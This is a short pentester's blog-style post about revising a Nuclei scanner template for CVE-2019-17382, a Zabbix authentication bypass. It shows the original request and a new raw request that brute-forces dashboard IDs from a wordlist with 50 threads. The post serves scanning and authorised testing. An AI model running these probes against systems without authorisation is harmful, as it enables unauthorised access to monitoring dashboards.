Doing traditional pentest is still fun (the real one, not the one like "You have a vulnerable version of XYZ software and sorry, no evidence of exploitation nor PoC).
One of the latest I got took me to make a small contribution to Nuclei Templates, yes, pure YAML.
A teammate noticed that Zabbix installation in one target was vulnerable to authentication bypass. A well known vulnerability and I wanted to know if there was a template from Nuclei and yes, there was one. However, Nuclei + this template couldn't find the vulnerability.
CVE-2019-17382.yaml template had a request like this :
requests:
- method: GET
path:
- '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'
Problem is that Dashboards can be deleted and the id will change, I mean, in several installations there is no dashboardid=1, but, maybe equal to 2 or 12 or whatever.
So, the new version of the request makes use of a payload (in this case a file with a list of possible IDs) and changes to a raw request :
requests:
- payloads:
ids: helpers/wordlists/numbers.txt
attack: sniper
threads: 50
raw:
- |
GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
Accept-Language: en-US,en;q=0.9
